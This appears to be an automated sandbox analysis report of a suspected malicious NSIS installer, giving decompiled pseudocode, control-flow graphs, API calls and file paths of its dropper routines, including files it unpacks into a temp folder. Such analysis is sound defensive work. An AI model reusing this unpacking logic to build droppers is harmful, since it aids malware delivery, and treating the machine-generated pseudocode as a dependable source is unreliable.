              • API ID: File$AttributesCountCreateModuleNameSizeTick
              • String ID: "C:\Users\user\Desktop\P196hUN2fw.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\P196hUN2fw.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
              • API String ID: 4283519449-1726628500
              • Opcode ID: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
              • Instruction ID: b7ea9236aecaa86e611592eb70b2ed5589fa10121b1bd9207fea2451aa196312
              • Opcode Fuzzy Hash: 7ea76b1eabee36cc462c4becf9ee5f087804ecb308710c36f18c8c35563ccf84
              • Instruction Fuzzy Hash: 9D51F431A00215ABDB20AF64DE89B9F7BB8FB14358F50413BE504B72D1C7B88D858B9C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402F81 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 341 402f81-402f95 342 402f97 341->342 343 402f9e-402fa7 341->343 342->343 344 402fb0-402fb5 343->344 345 402fa9 343->345 346 402fc5-402fd2 call 403193 344->346 347 402fb7-402fc0 call 4031a9 344->347 345->344 351 403181 346->351 352 402fd8-402fdc 346->352 347->346 353 403183-403184 351->353 354 402fe2-40302b GetTickCount 352->354 355 40312c-40312e 352->355 356 40318c-403190 353->356 357 403031-403039 354->357 358 403189 354->358 359 403130-403133 355->359 360 40316e-403171 355->360 362 40303b 357->362 363 40303e-40304c call 403193 357->363 358->356 359->358 361 403135 359->361 364 403173 360->364 365 403176-40317f call 403193 360->365 366 403138-40313e 361->366 362->363 363->351 375 403052-40305b 363->375 364->365 365->351 373 403186 365->373 369 403140 366->369 370 403142-403150 call 403193 366->370 369->370 370->351 378 403152-403157 call 405ba5 370->378 373->358 377 403061-403081 call 406422 375->377 383 403124-403126 377->383 384 403087-40309a GetTickCount 377->384 382 40315c-40315e 378->382 385 403160-40316a 382->385 386 403128-40312a 382->386 383->353 387 40309c-4030a4 384->387 388 4030df-4030e1 384->388 385->366 391 40316c 385->391 386->353 392 4030a6-4030aa 387->392 393 4030ac-4030dc MulDiv wsprintfA call 40508c 387->393 389 4030e3-4030e7 388->389 390 403118-40311c 388->390 394 4030e9-4030f0 call 405ba5 389->394 395 4030fe-403109 389->395 390->357 396 403122 390->396 391->358 392->388 392->393 393->388 401 4030f5-4030f7 394->401 400 40310c-403110 395->400 396->358 400->377 402 403116 400->402 401->386 403 4030f9-4030fc 401->403 402->358 403->400
              C-Code - Quality: 95%
              			E00402F81(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x419428;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004031A9( *0x42f478 + _t62);
				}
				if(E00403193( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E00403193(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E00403193(0x415428, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405BA5(_a8, 0x415428, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bd8c =  *0x40bd8c & 0x00000000;
					 *0x40bd88 =  *0x40bd88 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b870 = 8;
					 *0x415418 = 0x40d410;
					 *0x415414 = 0x40d410;
					 *0x415410 = 0x415410;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403193(0x415428, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b860 = 0x415428;
						 *0x40b864 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b868 = _t95;
							 *0x40b86c = _v12;
							_t75 = E00406422(0x40b860);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b868; // 0x419517
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040508C(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b868; // 0x419517
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405BA5(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























              0x00402f89
              0x00402f8d
              0x00402f90
              0x00402f95
              0x00402f97
              0x00402f97
              0x00402f9e
              0x00402fa2
              0x00402fa7
              0x00402fa9
              0x00402fa9
              0x00402fb0
              0x00402fb5
              0x00402fc0
              0x00402fc0
              0x00402fd2
              0x00403181
              0x00403181
              0x00000000
              0x00402fd8
              0x00402fdc
              0x0040312e
              0x00403171
              0x00403173
              0x00403173
              0x0040317f
              0x00403186
              0x00403189
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040317f
              0x00403133
              0x00000000
              0x00000000
              0x00403135
              0x00403138
              0x0040313b
              0x0040313e
              0x00403140
              0x00403140
              0x00403150
              0x00000000
              0x00000000
              0x00403157
              0x0040315e
              0x00403128
              0x00403128
              0x00403183
              0x00403183
              0x00000000
              0x00403183
              0x00403160
              0x00403163
              0x0040316a
              0x00000000
              0x00000000
              0x00000000
              0x0040316c
              0x00000000
              0x00403138
              0x00402fe8
              0x00402fea
              0x00402ff1
              0x00402ff8
              0x00402ff8
              0x00402fff
              0x00403007
              0x00403011
              0x00403016
              0x0040301e
              0x00403028
              0x0040302b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00403031
              0x00403031
              0x00403031
              0x00403039
              0x0040303b
              0x0040303b
              0x0040304c
              0x00000000
              0x00000000
              0x00403052
              0x00403055
              0x0040305b
              0x00403061
              0x00403061
              0x0040306c
              0x00403072
              0x00403077
              0x0040307e
              0x00403081
              0x00000000
              0x00000000
              0x00403087
              0x0040308d
              0x0040308f
              0x00403098
              0x0040309a
              0x004030c8
              0x004030ce
              0x004030d7
              0x004030dc
              0x004030dc
              0x004030e1
              0x0040311c
              0x00000000
              0x00000000
              0x00000000
              0x004030e3
              0x004030e7
              0x004030fe
              0x00403103
              0x00403106
              0x00403109
              0x0040310c
              0x00403110
              0x00000000
              0x00000000
              0x00000000
              0x00403116
              0x004030f0
              0x004030f7
              0x00000000
              0x00000000
              0x004030f9
              0x00000000
              0x004030f9
              0x004030e1
              0x00403124
              0x00000000
              0x00403124
              0x00000000
              0x00403031

              APIs
              Strings
              • ... %d%%, xrefs: 004030C2
              • (TA, xrefs: 00403142
              • <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup></configuration>, xrefs: 00403002
              • (TA, xrefs: 0040303E
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: CountTick$wsprintf
              • String ID: (TA$(TA$... %d%%$<?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup></configuration>
              • API String ID: 551687249-1307617928
              • Opcode ID: 219cae2b91f3bf38bad7132d0a8990421fc9c3883ef73589e1e6bd7f052db87f
              • Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
              • Opcode Fuzzy Hash: 219cae2b91f3bf38bad7132d0a8990421fc9c3883ef73589e1e6bd7f052db87f
              • Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 404 401759-40177c call 402ac1 call 40596a 409 401786-401798 call 405f65 call 4058fd lstrcatA 404->409 410 40177e-401784 call 405f65 404->410 415 40179d-4017a3 call 4061cf 409->415 410->415 420 4017a8-4017ac 415->420 421 4017ae-4017b8 call 406268 420->421 422 4017df-4017e2 420->422 430 4017ca-4017dc 421->430 431 4017ba-4017c8 CompareFileTime 421->431 424 4017e4-4017e5 call 405ad9 422->424 425 4017ea-401806 call 405afe 422->425 424->425 432 401808-40180b 425->432 433 40187e-4018a7 call 40508c call 402f81 425->433 430->422 431->430 434 401860-40186a call 40508c 432->434 435 40180d-40184f call 405f65 * 2 call 405f87 call 405f65 call 405681 432->435 447 4018a9-4018ad 433->447 448 4018af-4018bb SetFileTime 433->448 445 401873-401879 434->445 435->420 467 401855-401856 435->467 449 40295a 445->449 447->448 451 4018c1-4018cc FindCloseChangeNotification 447->451 448->451 454 40295c-402960 449->454 452 402951-402954 451->452 453 4018d2-4018d5 451->453 452->449 456 4018d7-4018e8 call 405f87 lstrcatA 453->456 457 4018ea-4018ed call 405f87 453->457 463 4018f2-4022e6 call 405681 456->463 457->463 463->452 463->454 467->445 469 401858-401859 467->469 469->434
              C-Code - Quality: 75%
              			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402AC1(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E0040596A(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\nst356E.tmp\\tpdhmfnkjvlicv.exe.config";
				if(_t33 == 0) {
					lstrcatA(E004058FD(E00405F65(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp\\nst356E.tmp")), ??);
				} else {
					E00405F65();
				}
				E004061CF(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00406268(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405AD9(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405AFE(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040508C(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E00405F65(0x40ac18, 0x430000);
						E00405F65(0x430000, _t83);
						E00405F87(_t75, 0x40ac18, _t83, "C:\Users\alfons\AppData\Local\Temp\nst356E.tmp\nsExec.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405F65(0x430000, 0x40ac18);
						_t62 = E00405681("C:\Users\alfons\AppData\Local\Temp\nst356E.tmp\nsExec.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040508C();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040508C(0xffffffea,  *(_t85 - 8));
				 *0x42f4d4 =  *0x42f4d4 + 1;
				_t43 = E00402F81( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f4d4 =  *0x42f4d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405F87(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00405F87(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405681();
					goto L29;
				}
				goto L33;
			}

















              0x00401759
              0x00401760
              0x00401769
              0x0040176c
              0x0040176f
              0x00401774
              0x00401775
              0x0040177c
              0x00401798
              0x0040177e
              0x0040177f
              0x0040177f
              0x0040179e
              0x004017a8
              0x004017a8
              0x004017ac
              0x004017af
              0x004017b4
              0x004017b6
              0x004017b8
              0x004017bd
              0x004017bd
              0x004017c8
              0x004017c8
              0x004017d9
              0x004017db
              0x004017db
              0x004017dc
              0x004017dc
              0x004017df
              0x004017e2
              0x004017e5
              0x004017e5
              0x004017ec
              0x004017fb
              0x00401800
              0x00401803
              0x00401806
              0x00000000
              0x00000000
              0x00401808
              0x0040180b
              0x00401865
              0x0040186a
              0x004015b0
              0x00402716
              0x00402716
              0x00402951
              0x00402954
              0x00402954
              0x00000000
              0x0040180d
              0x00401813
              0x0040181e
              0x0040182b
              0x00401836
              0x0040184c
              0x0040184c
              0x0040184f
              0x00000000
              0x00401855
              0x00401855
              0x00401856
              0x00401873
              0x0040295a
              0x0040295a
              0x0040295a
              0x00401858
              0x00401858
              0x00401859
              0x00401492
              0x004022e1
              0x004022e1
              0x004022e1
              0x00401856
              0x0040184f
              0x0040295c
              0x00402960
              0x00402960
              0x00401883
              0x00401888
              0x00401896
              0x0040189b
              0x004018a1
              0x004018a5
              0x004018a7
              0x004018af
              0x004018bb
              0x004018a9
              0x004018a9
              0x004018ad
              0x00000000
              0x00000000
              0x004018ad
              0x004018c4
              0x004018ca
              0x004018cc
              0x00000000
              0x004018d2
              0x004018d2
              0x004018d5
              0x004018ed
              0x004018d7
              0x004018da
              0x004018e3
              0x004018e3
              0x004018f2
              0x004018f7
              0x004022dc
              0x00000000
              0x004022dc
              0x00000000

              APIs
              • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe.config,C:\Users\user\AppData\Local\Temp\nst356E.tmp,00000000,00000000,00000031), ref: 00401798
              • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe.config,C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe.config,00000000,00000000,C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe.config,C:\Users\user\AppData\Local\Temp\nst356E.tmp,00000000,00000000,00000031), ref: 004017C2
                • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                • Part of subcall function 0040508C: lstrlenA.KERNEL32(0042A050,00000000,00419517,766DEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                • Part of subcall function 0040508C: lstrlenA.KERNEL32(004030DC,0042A050,00000000,00419517,766DEA30,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                • Part of subcall function 0040508C: lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,00419517,766DEA30), ref: 004050E8
                • Part of subcall function 0040508C: SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                • Part of subcall function 0040508C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                • Part of subcall function 0040508C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                • Part of subcall function 0040508C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp\nst356E.tmp$C:\Users\user\AppData\Local\Temp\nst356E.tmp\nsExec.dll$C:\Users\user\AppData\Local\Temp\nst356E.tmp\tpdhmfnkjvlicv.exe.config
              • API String ID: 1941528284-2032025069
              • Opcode ID: 31c0dc35165cd9c2c81e055de88f8ba7219800017b80078377aa7409dfa41ea4
              • Instruction ID: 024705dcfdf044f05b4b82656432081f20986447a00b4521f0a60d415ab43704
              • Opcode Fuzzy Hash: 31c0dc35165cd9c2c81e055de88f8ba7219800017b80078377aa7409dfa41ea4
              • Instruction Fuzzy Hash: 4841B431A04515BECB107BB58C45EAF3679EF05369F60833BF421F20E1D67C89428A6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405552 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 471 405552-40559d CreateDirectoryA 472 4055a3-4055b0 GetLastError 471->472 473 40559f-4055a1 471->473 474 4055ca-4055cc 472->474 475 4055b2-4055c6 SetFileSecurityA 472->475 473->474 475->473 476 4055c8 GetLastError 475->476 476->474
              C-Code - Quality: 100%
              			E00405552(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408374;
				_v36.Group = 0x408374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







              0x0040555d
              0x00405561
              0x00405564
              0x0040556a
              0x0040556e
              0x00405572
              0x0040557a
              0x00405581
              0x00405587
              0x0040558e
              0x00405595
              0x0040559d
              0x0040559f
              0x00000000
              0x0040559f
              0x004055a9
              0x004055b0
              0x004055c6
              0x00000000
              0x00000000
              0x00000000
              0x004055c8
              0x004055cc

              APIs
              • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405595
              • GetLastError.KERNEL32 ref: 004055A9
              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055BE
              • GetLastError.KERNEL32 ref: 004055C8
              Strings
              • C:\Users\user\Desktop, xrefs: 00405552
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
              • API String ID: 3449924974-1521822154
              • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
              • Instruction ID: d93b5df8f7ffc7c008eac1e7bdc238e6dcac3e6f5ce479452586b7e310885e58
              • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
              • Instruction Fuzzy Hash: 550108B1C00219EADF11DBA1CD047EFBFB9EF04354F00803AD545B6290D77896088FA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040628F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 477 40628f-4062af GetSystemDirectoryA 478 4062b1 477->478 479 4062b3-4062b5 477->479 478->479 480 4062c5-4062c7 479->480 481 4062b7-4062bf 479->481 483 4062c8-4062fa wsprintfA LoadLibraryExA 480->483 481->480 482 4062c1-4062c3 481->482 482->483
              C-Code - Quality: 100%
              			E0040628F(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








              0x004062a6
              0x004062af
              0x004062b1
              0x004062b1
              0x004062b5
              0x004062c7
              0x004062c1
              0x004062c1
              0x004062c1
              0x004062cb
              0x004062df
              0x004062f3
              0x004062fa

              APIs
              • GetSystemDirectoryA.KERNEL32 ref: 004062A6
              • wsprintfA.USER32 ref: 004062DF
              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%s.dll$UXTHEME$\
              • API String ID: 2200240437-4240819195
              • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
              • Instruction ID: 90c405808a5079913e9fc86ee6967ca4c100a0af48b71fe7beb271d56a4ee20c
              • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
              • Instruction Fuzzy Hash: 89F0F630510609AADB15AB64DD0DFEB365CAB08304F1405BEA686F11C1EA78E9398B99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405B2D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 484 405b2d-405b37 485 405b38-405b63 GetTickCount GetTempFileNameA 484->485 486 405b72-405b74 485->486 487 405b65-405b67 485->487 489 405b6c-405b6f 486->489 487->485 488 405b69 487->488 488->489
              C-Code - Quality: 100%
              			E00405B2D(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3b4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









              0x00405b31
              0x00405b37
              0x00405b38
              0x00405b38
              0x00405b3d
              0x00405b3e
              0x00405b41
              0x00405b4b
              0x00405b58
              0x00405b5b
              0x00405b63
              0x00000000
              0x00000000
              0x00405b67
              0x00000000
              0x00000000
              0x00405b69
              0x00000000
              0x00405b69
              0x00000000

              APIs
              • GetTickCount.KERNEL32 ref: 00405B41
